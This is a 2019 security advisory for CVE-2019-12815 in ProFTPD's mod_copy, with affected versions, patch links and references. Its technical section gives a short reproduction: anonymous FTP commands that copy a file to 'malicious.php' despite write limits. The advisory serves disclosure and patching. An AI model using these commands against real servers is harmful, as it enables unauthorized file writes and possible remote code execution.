ASA-2019-00464 – ProFTPD: Arbitrary file copy vulnerability in mod_copy allows for remote code execution and information disclosure

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2019-00464

Identifier(s)

ASA-2019-00464, CVE-2019-12815

Title

Arbitrary file copy vulnerability in mod_copy allows for remote code execution and information disclosure

Vendor(s)

The ProFTPD Project

Product(s)

ProFTPD

Affected version(s)

ProFTPD versions up to and including 1.3.6

Fixed version(s)

ProFTPD version 1.3.6 with the following patch applied:

Backport of fix for Bug#4372 to the 1.3.6 branch.
https://github.com/proftpd/proftpd/commit/a73dbfe3b61459e7c2806d5162b12f0957990cb3

ProFTPD versions with the following patch applied:

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands.
https://github.com/proftpd/proftpd/pull/816/commits/71cd49ea82313f78d52a52d0c628a3770dc96608

Proof of concept

Unknown

Description

An arbitrary file copy vulnerability in mod_copy in ProFTPD allows for remote code execution and information disclosure.

Technical details

The mod_copy module’s custom SITE CPFR and SITE CPTO commands do not honor <Limit READ> and <Limit WRITE> configurations as expected.

To reproduce, just enable the anonymous user example that is configured in the Debian default proftpd.conf:

<Anonymous ~ftp>
User ftp
Group nogroup
UserAlias anonymous ftp
RequireValidShell off

MaxClients 10
DisplayLogin welcome.msg
DisplayChdir .message

# Limit WRITE everywhere in the anonymous chroot
<Directory *>
<Limit WRITE>
DenyAll
</Limit>
</Directory>

</Anonymous>

Login as anonymous. You normally can’t upload files, because of the DenyAll.

ftp proftptest.domain.org

site cpfr welcome.msg
site cpto malicious.php

You’ve now created a malicious.php file with the contents of welcome.msg. That can easily be used for RCE and similar things on many setups.

Credits

Tobias Mädel

Reference(s)

Bug 4372 – SITE CPFR/CPTO do not honor <Limit> configurations
http://bugs.proftpd.org/show_bug.cgi?id=4372

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands 3816.
https://github.com/proftpd/proftpd/pull/816

Bug #4372: Ensure that mod_copy checks for <Limits> for its SITE CPFR/CPTO commands.
https://github.com/proftpd/proftpd/pull/816/commits/71cd49ea82313f78d52a52d0c628a3770dc96608

Backport of fix for Bug#4372 to the 1.3.6 branch.
https://github.com/proftpd/proftpd/commit/a73dbfe3b61459e7c2806d5162b12f0957990cb3

CVE-2019-12815
https://security-tracker.debian.org/tracker/CVE-2019-12815

CVE-2019-12815 | SUSE
https://www.suse.com/security/cve/CVE-2019-12815

CVE-2019-12815 in Ubuntu
https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12815.html

CVE-2019-12815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815

CVE-2019-12815
https://nvd.nist.gov/vuln/detail/CVE-2019-12815

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: July 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.